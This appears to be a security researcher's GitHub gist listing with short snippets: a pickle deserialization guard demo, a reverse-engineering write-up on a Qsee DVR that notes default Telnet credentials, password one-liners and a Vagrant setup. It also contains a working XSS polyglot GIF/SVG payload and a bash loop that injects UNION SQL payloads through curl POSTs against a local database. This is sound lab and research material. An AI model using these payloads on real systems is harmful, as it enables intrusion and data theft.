Skip to content

Instantly share code, notes, and snippets.

View thewb's full-sized avatar

thewb

3 followers · 15 following
View GitHub Profile
@thewb
thewb / safe_pickle.py
Created May 12, 2025 16:27
Java LAOIS (look ahead deserialization) implemented in Python
#!/usr/bin/python3
from pickletools import genops
from pickle import dump
from pickle import loads
from datetime import datetime
class MaliciousClass:
def __reduce__(self):
return (print, ("Malicious code executed!",))
@thewb
thewb / optimus_prime.py
Last active January 6, 2025 17:44
caching prime check
#!/usr/bin/python3
import sys
import sqlite3
import pickle
import random
prime_cache_messages = {
"new_prime_cached": "Dude, we just snagged a freshie prime!",
"prime_high_five": "High five, bro! Just scored another prime!",
"totally_rad_prime": "Whoa! This prime is totally rad!",
@thewb
thewb / xss.gif
Created December 30, 2024 19:49
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
@thewb
thewb / test.svg
Last active December 30, 2024 19:55
xss svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@thewb
thewb / qsee-qt5682.md
Last active December 20, 2024 19:38
Qsee QT5682 DVR

Introduction

The Qsee QT5682 is a security camera DVR system that can support up to eight cameras. The DVR software listens on TCP port 6036, and thick clients for major operating systems can be downloaded from a web server hosted on the device.

This project started with reverse-engineering functions in the Objective-C (MacOS) client binary, which are used to marshal data from XML into the custom communication protocol over TCP port 6036.

A valid protocol message, reverse-engineered from the marshaling code, was bit-flipped and transmitted until it caused the DVR system to crash and reboot.

To further explore the cause of the crash, a shell on the DVR or dumping the firmware is required. An Nmap scan showed the DVR has a listening Telnet service, but the login credentials (username: admin, password: 123456) were rejected. This appears to be out-of-band management and is not mentioned in the device documentation.

@thewb
thewb / asm-tips.md
Created October 8, 2024 22:49

1's Compliment

num & -1 -> r

#include <stdio.h>
@thewb
thewb / oneliners.md
Created September 22, 2024 18:55
easy to type password for devices ig? 
python3 -c "import secrets; import string; c = string.ascii_uppercase + string.ascii_lowercase + string.digits; print(''.join([secrets.choice(c) if i % 5 != 0 else '-' for i in range(1,35)]))"
@thewb
thewb / gist:e815bfb879dd11edc587559f7b2074ed
Created September 20, 2024 18:31
python3 -c "import secrets; import string; c = string.ascii_uppercase + string.ascii_lowercase + string.digits; print(''.join([secrets.choice(c) for i in range(32)]))"
@thewb
thewb / Vagrant-M1-Install.bash
Created September 19, 2024 19:25 — forked from beauwilliams/Vagrant-M1-Install.bash
Run x86 VM's on Mac M1 arm using vagrant with qemu hypervisor
brew install vagrant qemu
#Due to dependency errors, we must install vbguest first..
vagrant plugin install vagrant-vbguest
vagrant plugin install vagrant-qemu
#cd to working dir you like to keep your vagrant files
cd ~/VM-and-containers/VagrantMachines/M1-vagrantfiles/ubuntu18-generic-64/
#Create a vagrant file
$EDITOR Vagrantfile
@thewb
thewb / sqli.md
Created September 13, 2024 15:59
sqlite3 union injection via JSON/POST in bash one-liner

union injection json/post with curl

Uses "chinook" sqlite3 database @ https://github.com/lerocha/chinook-database

for i in $(seq 1 20); do
  NULLS=$(printf 'NULL, %.0s' $(seq 1 $i))
  NULLS=${NULLS%, }
  curl --max-time 2 -d "{\"city\":\"edmonton' UNION SELECT $NULLS,name FROM sqlite_master WHERE type='table';\"}" -H "Content-Type: application/json" -X POST "http://localhost:3000/data"
 sleep 1